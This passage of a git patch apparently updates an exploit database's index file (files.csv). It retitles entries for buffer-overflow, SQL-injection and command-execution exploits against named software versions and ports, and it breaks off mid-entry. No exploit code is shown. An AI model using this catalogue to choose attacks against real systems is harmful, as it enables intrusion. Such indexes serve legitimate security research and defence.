From 2d7502a652300e8b068278dad5774349bdcfff97 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sun, 23 Mar 2014 04:30:36 +0000 Subject: [PATCH] Updated 03_23_2014 --- files.csv | 157 +++++---- platforms/cgi/webapps/1680.pm | 499 ++++++++++++++-------------- platforms/cgi/webapps/32430.txt | 9 + platforms/hardware/dos/9268.rb | 104 +++--- platforms/jsp/webapps/32423.txt | 9 + platforms/jsp/webapps/32424.txt | 9 + platforms/jsp/webapps/32425.txt | 9 + platforms/php/webapps/32418.txt | 11 + platforms/php/webapps/32419.pl | 101 ++++++ platforms/php/webapps/32421.html | 9 + platforms/php/webapps/32422.txt | 13 + platforms/php/webapps/32427.txt | 9 + platforms/php/webapps/32431.txt | 7 + platforms/php/webapps/32432.txt | 10 + platforms/php/webapps/32433.txt | 10 + platforms/php/webapps/32434.txt | 7 + platforms/php/webapps/32437.txt | 82 +++++ platforms/php/webapps/5762.txt | 38 +-- platforms/php/webapps/8820.txt | 432 ++++++++++++------------ platforms/windows/dos/32420.c | 163 +++++++++ platforms/windows/dos/32428.txt | 126 +++++++ platforms/windows/dos/32435.c | 46 +++ platforms/windows/remote/1626.pm | 238 ++++++------- platforms/windows/remote/32426.c | 214 ++++++++++++ platforms/windows/remote/32429.html | 10 + 25 files changed, 1597 insertions(+), 725 deletions(-) create mode 100755 platforms/cgi/webapps/32430.txt create mode 100755 platforms/jsp/webapps/32423.txt create mode 100755 platforms/jsp/webapps/32424.txt create mode 100755 platforms/jsp/webapps/32425.txt create mode 100755 platforms/php/webapps/32418.txt create mode 100755 platforms/php/webapps/32419.pl create mode 100755 platforms/php/webapps/32421.html create mode 100755 platforms/php/webapps/32422.txt create mode 100755 platforms/php/webapps/32427.txt create mode 100755 platforms/php/webapps/32431.txt create mode 100755 platforms/php/webapps/32432.txt create mode 100755 platforms/php/webapps/32433.txt create mode 100755 platforms/php/webapps/32434.txt create mode 100755 platforms/php/webapps/32437.txt create mode 100755 platforms/windows/dos/32420.c create mode 
100755 platforms/windows/dos/32428.txt create mode 100755 platforms/windows/dos/32435.c create mode 100755 platforms/windows/remote/32426.c create mode 100755 platforms/windows/remote/32429.html diff --git a/files.csv b/files.csv index c9d06a0db..c6ec6a203 100755 --- a/files.csv +++ b/files.csv @@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 -1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 +1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 
@@ -1408,7 +1408,7 @@ id,file,description,date,author,platform,type,port 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 -1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 +1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 
@@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port 1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0 -1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 +1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 
@@ -4997,7 +4997,7 @@ id,file,description,date,author,platform,type,port 5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability",2008-04-04,JIKO,php,webapps,0 -5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0 +5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0 5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability",2008-04-04,"Virangar Security",php,webapps,0 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion Vulnerability",2008-04-04,w0cker,php,webapps,0 
@@ -5382,7 +5382,7 @@ id,file,description,date,author,platform,type,port 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 -5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 +5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0 
@@ -8316,7 +8316,7 @@ id,file,description,date,author,platform,type,port 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 -8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 +8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0 
@@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0 -9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 +9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 
@@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 -9886,platforms/windows/remote/9886.txt,"httpdx 1.4 h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 +9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 
@@ -9290,50 +9290,50 @@ id,file,description,date,author,platform,type,port 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 -9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 +9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0 -9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 -9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25 +9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 +9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783 -9915,platforms/multiple/remote/9915.rb,"DistCC Daemon Command Execution",2002-02-01,"H D Moore",multiple,remote,3632 +9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command 
Execution",2009-02-25,patrick,multiple,webapps,0 -9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2002-01-18,MC,solaris,remote,23 -9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23 -9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515 +9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23 +9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23 +9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111 +9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 -9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd Heap Overflow",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139 +9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139 9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS 
X)",2009-10-28,N/A,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548 -9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548 +9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 -9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0 +9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D 
Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0 -9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0 -9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar Buffer Overflow",2001-04-04,patrick,linux,remote,123 -9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup Remote Command Execution",2004-10-21,patrick,multiple,remote,0 -9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 Command Executino",2001-02-28,"H D Moore",multiple,remote,5555 -9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 Memory Access",2007-04-23,"H D Moore",multiple,remote,0 -9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch Command Execution",2008-10-23,egypt,multiple,remote,0 +9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0 +9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123 +9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0 +9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555 +9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0 +9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0 9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0 -9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0 -9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution",2005-07-13,"H D 
Moore",windows,remote,0 +9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0 +9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0 9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0 -9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 -9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 -9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 -9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 -9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 +9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 +9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 +9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 +9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 +9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer 
Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 @@ -9383,7 +9383,7 @@ id,file,description,date,author,platform,type,port 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0 -10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 +10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0 
@@ -9393,25 +9393,25 @@ id,file,description,date,author,platform,type,port 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0 -10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10022,platforms/linux/local/10022.c,"Linux Kernel 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0 -10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 -10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 -10025,platforms/linux/remote/10025.rb,"University of Washington imap LSUB Buffer 
Overflow",2000-04-16,patrick,linux,remote,143 -10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080 +10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 +10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 +10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143 +10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080 10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80 -10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 +10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80 -10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 -10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515 -10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 report 
